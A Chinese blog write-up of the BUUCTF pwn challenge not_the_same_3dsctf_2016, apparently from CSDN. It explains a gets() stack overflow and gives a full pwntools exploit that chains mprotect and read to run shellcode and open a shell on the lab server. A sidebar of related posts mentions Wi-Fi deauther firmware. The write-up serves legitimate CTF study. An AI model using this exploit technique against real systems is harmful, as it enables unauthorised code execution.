BUUCTF-PWN-not_the_same_3dsctf_2016

最新推荐文章于 2023-03-14 21:47:57 发布
最新推荐文章于 2023-03-14 21:47:57 发布
阅读量183 收藏
点赞数 1
分类专栏: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Henlenl/article/details/117017515
版权
CTF 同时被 2 个专栏收录
28 篇文章 2 订阅
订阅专栏
pwn
7 篇文章 0 订阅
订阅专栏

文章目录

查看文件信息

开了个NX保护
在这里插入图片描述

IDA静态分析

开始看上去 其实就是利用gets()来溢出的
在这里插入图片描述

我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串

在这里插入图片描述
我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读不到flag的,而f14g在bss段 根本没有ret指令可以利用
在这里插入图片描述

但是 这里面有mprotect函数 可以用它来修改我们内存栈的权限,让它可读可写可执行,接着让写入shellcode,然后执行获取shell
在这里插入图片描述
这里我们需要借助三个参数的三个寄存器指令

ROPgadget --binary pwn --only “pop|ret” | grep pop

在这里插入图片描述
将.got.plt改为可读可执行
在这里插入图片描述
将返回地址填写成read函数,传入read函数的参数,然后将返回地址改为我们修改为可读可写可执行的地址,最好去写入shellcode 函数

exp

from pwn import *


elf = ELF('pwn')
#r = process('pwn')
r = remote('node3.buuoj.cn',27357)

mprotect_addr = 0x0806ed40
addr = 0x080eb000
ret_addr = 0x0806fcc8
read_addr = elf.symbols['read']

shellcode = asm(shellcraft.sh())

payload = 'a' * 0x2d+p32(mprotect_addr)+p32(ret_addr)
payload += p32(addr)+p32(0x100)+p32(0x7)
payload+= p32(read_addr)+p32(ret_addr)
payload+=p32(0)+p32(addr)+p32(len(shellcode))+p32(addr)

r.sendline(payload)
r.sendline(shellcode)

r.interactive()
Persistent_s
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 187
本题目本地与远程得用两种方案打。
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1619
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3760
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 145
not_the_same_3dsctf_2016 wp (python3)
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1213
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
not_the_same_3dsctf_2016
m0sway的博客
03-28 256
not_the_same_3dsctf_2016 WriteUp BUU PWN
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 295
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
[PWN] BUUCTF not_the_same_3dsctf_2016的三种做法
空城惜梦的博客
06-03 324
[PWN] BUUCTF not_the_same_3dsctf_2016的三种做法1.维持函数正常结束(printf打印)payload1(FALSE)payload2(TRUE)2.write打印payload3.修改栈区权限存在疑惑参考wp 按照惯例先checksec一下,发现没有canary和pie 之后用ida查看主要函数main有个gets函数存在栈溢出 函数窗口中有个backdoor函数get_secret,因为这个函数可以读取flag.txt并且通过v0将内容写进fl4g,所以可以想到在
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 524
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
BUU PWN(一)
playmaker的博客
01-28 2106
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 427
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 359
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
BUUCTF not_the_same
doudoudedi
10-03 352
开始以为是简单的栈溢出发现可以调用的函数很少 而且开启了nx,leak不了libc。这里需要将bss段设置成可读可写可执行,然后跳到bss段执行shellcode 我这里参数中有地址最好使用gadget exp: from pwn import * def debug(): gdb.attach(p) p=process('./notsame') #p=remote('node2.buuoj...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值